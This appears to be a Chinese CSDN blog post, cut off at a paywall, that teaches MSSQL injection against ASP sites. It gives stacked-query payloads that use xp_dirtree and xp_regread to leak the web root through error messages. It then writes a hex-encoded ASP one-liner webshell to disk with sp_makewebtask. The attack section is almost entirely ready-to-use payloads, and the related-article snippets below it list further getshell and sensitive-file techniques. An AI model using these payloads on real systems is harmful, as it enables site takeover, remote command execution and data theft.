【安全牛学习笔记】MSsqlL注入取得网站路径最好的方法

最新推荐文章于 2022-08-17 15:26:58 发布
最新推荐文章于 2022-08-17 15:26:58 发布
阅读量2.4k 收藏 1
点赞数
分类专栏: 信息安全 文章标签: 测试 Security+ 信息安全 linux 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/edu_aqniu/article/details/78409451
版权

exec master..xp_dirtree'd:/test'

假设我们在test里有两个文件夹test1和test2在test1里又有test3
结果显示
subdirectory depth
test1 1
test3 2
test2 1
哈哈发现没有那个depth就是目录的级数
ok了,知道怎么办了吧
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
只要加上id=1,就是第一级目录 。
通过注册表读网站路径:
1.;create table [dbo].[cyfd] ([gyfd][char](255));
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
and 1=(select count(*) from cyfd where gyfd > 1)
这样IE报错,就把刚才插进去的Web路径的值报出来了
4.drop table cyfd;-- 删除临时表
获得webshell方法:
1.create table cmd (a image)-- \**cmd是创建的临时表
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
EXECUTE

最低0.47元/天 解锁文章
爱学习的小牛
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSsqlL注入取得网站路径最好的方法.txt
07-18
MSsqlL注入取得网站路径最好的方法
Web安全基础学习:SQL注入漏洞之Mssql注入
最新发布
qq_51862722的博客
06-18 883
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
SQL注入时快速获得WEB根目录
得峰的专栏 [网络收藏]
05-04 3426
本文章针对以下环境,如果不符合以下的条件,就不适合用下面提到的方法来获得WEB根目录。 1、SQL SERVER允许执行多行语句; 2、该网站能进行注入; 3、没有返回详细的错误提示信息(否则没有必要用这种方法)。 根据经验,猜疑WEB根目录的顺序是:d盘、e盘、c盘,首先我们建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树,用以下语句: ;create
mysql注入如何读取本地文件_如何通过SQL注入获取服务器本地文件
weixin_28843191的博客
01-28 555
写在前面的话SQL注入可以称得上是最臭名昭著的安全漏洞了,而SQL注入漏洞也已经给整个网络世界造成了巨大的破坏。针对SQL漏洞,研究人员也已经开发出了多种不同的利用技术来实施攻击,包括非法访问存储在远程数据库中的数据、从服务器读/写数据、以及通过MSSQL的SA账号完成任意命令执行等等。在这篇文章中,我们准备利用一个存在于文件下载函数中的SQL注入漏洞,我们将利用存在漏洞的SQL语句并从远程服务器...
杂七杂八的敏感文件注释<持续更新帖>
weixin_30641999的博客
05-14 98
============敏感文件读取================ WINDOWS下: c:/boot.ini //查看系统版本 c:/windows/php.ini //php配置信息 c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt...
安全:Web安全学习笔记
02-26
这个月看了一本《Web安全设计之道》,书中的内容多是从微软官方文档翻译而来,这本书的含金量不高,不过也不能说没有收获,本文简单记录一下我学习Web安全方面的笔记。本文不涉及IIS、Windows和SqlServer的安全管理...
信息安全工程师学习笔记.rar
03-06
《信息安全工程师学习笔记》是针对软考中级信息安全工程师考试的一份详实的学习资料,这份压缩包文件包含了丰富的知识内容,旨在帮助考生系统性地理解和掌握信息安全领域的核心概念、原理和实践技能。以下将对这份...
路径规划实用搜索技术的学习笔记
01-20
路径规划实用搜索技术的学习笔记》是对自主驾驶领域中路径规划算法的一种深入探讨,特别是针对Hybrid A*算法的应用和优势。Hybrid A*是由斯坦福大学在2010年提出的,它专为在未知环境中运行的自动驾驶车辆设计,...
Python学习笔记-模块中的方法(系统模块,OS)
01-20
系统模块 输入输出: print(),input() 数据类型: str(),int(),float(),list(),set(),dict(),tuple() 求和排序: max(),min(),sum(),sorted() 获取长度: len() 类型判断: id(),type(),isinstance():...
SQL注入目录
weixin_34217711的博客
05-08 156
第1课:SQL注入原理深度解析 第2课:什么是SQL注入  
mssql 获取网站绝对路径写shell
问题很多的小明
08-13 3145
1 存在sql注入 创建表 GET /get.asp?act_id=52;create+table+gogotest+(tmp+varchar(1000));----&user_name=123 HTTP/1.1 Host: 360gongfang.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel M
【SQL注入详解】
一纸荒芜的博客
08-17 3260
sql注入类型与其他扩展
Mssql(sqlserver)差异备份getshell思路笔记
来到了学渣的博客
04-05 1701
差异备份的概念(百度百科): 备份自上一次完全备份之后有变化的数据。差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不清除标记,也即备份后不标记为已备份文件。换言之,不清除存档属性。 差异备份getshell条件: 目标站是否存在mssql数据库注入漏洞 目标站的用户是否具备sa权限、dbo权限 找到网站的物理路径 大概思路: 假设:http://xxxxx/show.aspx?c...
72.网络安全渗透测试—[SQL注入篇11]—[SQLSERVER+ASP-报错注入]
qwsn
01-18 3171
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 报错注入 1、sql server的报错页面 2、SQLSERVER+ASP 报错注入示例
MSsql注入取得网站路径最好的方法
dibodang1423的博客
05-16 980
好,我们exec master..xp_dirtree'd:/test'假设我们在test里有两个文件夹test1和test2在test1里又有test3结果显示subdirectory depthtest1 1test3 2test2 1 哈哈发现没有那个depth就是目录的级数ok了,知道怎么办了吧 http://www.xxxxx.com/down/list.asp?id=...
获取网站路径绝对路径方法汇总
None安全团队
11-20 2702
获取网站路径绝对路径方法汇总 一、单引号爆路径 就像测试SQL注入一样在参数后面加上单引号。 1 http://localhost/news.php?id=100' 二、错误参数值爆路径 通过第一种方式可以会触发waf,因此可以通过错误的参数值来爆网站路径。 如: 1 2 http://localhost/news.php?id=-1 http://localhost/news.php?id=oSxM.
sql注入getshell的几种方式
热门推荐
good good study
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell。
sql注入与sqlmap全详细
qq_41620273的博客
12-25 3458
sql注入与sqlmap SQL注入危害: SQL注入分类: 1.基于注入点分类:get注入、post注入、cookie注入 2.基于变量数据类型: 字符型、数字型注入 3.基于获取数据类型方法: 基于回显(查询结果直接显现)、基于错误(由于配置的原因,包错日志原本因该打印到日志文件夹中,却直接输出到了网页页面上来了)、盲注(布尔盲注、时间盲注) 数字型: 布尔盲注: 在id=1后拼接 and 1=1或者 and 1=2; 判断是true或者false 时间盲注:在id=1后拼接
"MATLAB编程笔记学习体会:路径设置与程序调试
学习和掌握MATLAB的路径设置和程序调试对于编程的效率和准确性都非常重要。通过合理设置初始工作文件夹和搜索路径,我们可以更高效地组织和管理我们的文件和函数。而通过程序调试工具,我们可以快速定位和解决代码中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值